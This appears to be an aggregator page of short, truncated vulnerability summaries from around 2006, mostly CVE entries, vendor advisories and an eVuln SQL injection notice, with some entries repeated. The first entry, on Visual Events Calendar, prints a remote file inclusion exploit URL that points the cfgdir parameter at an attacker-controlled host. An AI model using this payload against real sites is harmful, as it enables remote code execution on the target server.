Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion

title: Visual Events Calendar v1.1 cfgdir Remote Inclusion Vulnerability Author: xoron script: Visual Events Calendar v1.1 Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $cfgdir."customizetext.php"; Exploit: http://www.site.com/path/calendar.php?cfgdir=http://evilscripts? Thanx :...

Mozilla Firefox: Multiple vulnerabilities

Background Mozilla Firefox is a redesign of the Mozilla Navigator component. The goal is to produce a cross-platform stand-alone browser application. Description The following vulnerabilities have been reported: Benjamin Smedberg discovered that chrome URL's could be made to reference remote file...

security flaw

Mozilla Firefox 1.5 before 1.5.0.5, Thunderbird before 1.5.0.5, and SeaMonkey before 1.0.3 allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via simultaneous XPCOM events, which causes a timer object to be deleted in a way that triggers memory corrupti...

Hacking skills: in the Real movie put Trojan horse-vulnerability warning-the black bar safety net

Frequently encountered rm the movie plays when pop-up web pages, has been do not know how, a few days ago saw the mass of software in an article only to know the insertion and removal method, a good dongdong dare not exclusive, in the online search of the three articles, The to everyone. In the...

CVE-2006-3383

Cross-site scripting XSS vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover within a URL. NOTE: the provenance of this information is unknown; the details are obtained solely from third party reports...

CVE-2006-3383

Cross-site scripting XSS vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover within a URL. NOTE: the provenance of this information is unknown; the details are obtained solely from third party reports...

CVE-2006-3052

Cross-site scripting XSS vulnerability in Event Registration allows remote attackers to inject arbitrary web script or HTML via the 1 eventid parameter to view-event-details.php or 2 selectevents parameter to event-registration.php. NOTE: the provenance of this information is unknown; the details...

Unrestricted file upload

Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be...

CVE-2006-2900

Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be...

CVE-2006-2900

CVE-2006-2900 concerns Internet Explorer 6 and an information-disclosure issue where a user-assisted attacker could cause file content disclosure by manipulating focus via OnKeyDown/OnKeyPress/OnKeyUp events and inserting characters into a file upload control. The core vector is a keystroke hijac...

CVE-2006-2894

Mozilla Firefox 1.5.0.4, 2.0.x before 2.0.0.8, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2 and other versions before 1.1.5, and Netscape 8.1 and earlier allow user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text bo...

Unrestricted file upload

Mozilla Firefox 1.5.0.4, 2.0.x before 2.0.0.8, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2 and other versions before 1.1.5, and Netscape 8.1 and earlier allow user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text bo...

CVE-2006-2894

Mozilla Firefox 1.5.0.4, 2.0.x before 2.0.0.8, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2 and other versions before 1.1.5, and Netscape 8.1 and earlier allow user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text bo...

CVE-2006-1439

CVE-2006-1439 affects NSSecureTextField in AppKit on Apple Mac OS X 10.4.6. The vulnerability: secure input is not re-enabled under certain circumstances, potentially allowing other window-session applications to monitor input characters and keyboard events. The description and related references...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via Javascript events such as "onmouseover" in the 1 color, 2 size, or 3 url bbcode tags...

CVE-2006-2143

Multiple cross-site scripting XSS vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via Javascript events such as "onmouseover" in the 1 color, 2 size, or 3 url bbcode tags...

CVE-2006-2143

Multiple cross-site scripting XSS vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via Javascript events such as "onmouseover" in the 1 color, 2 size, or 3 url bbcode tags...

CVE-2006-2143

CVE-2006-2143 describes multiple XSS vulnerabilities in TextFileBB 1.0.16. The issue allows remote attackers to inject arbitrary JavaScript/HTML via onmouseover-based events in the (1) color, (2) size, or (3) url bbcode tags. Affected software: TextFileBB 1.0.16. Root cause: lack of proper input ...

Critical: Red Hat Security Advisory: firefox security update

Updated firefox packages that fix several security bugs are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team. Updated 24 Apr 2006 The erratum text has been updated to include CVE-2006-0748, an issue fixed by these erratum packages...

EV0102.txt

New eVuln Advisory: Maian Events SQL Injection Vulnerability http://evuln.com/vulns/102/summary.html --------------------Summary---------------- eVuln ID: EV0102 CVE: CVE-2006-1341 Software: Maian Events Sowtware's Web Site: http://www.maianscriptworld.co.uk/ Versions: 1.0 Critical Level: Moderat...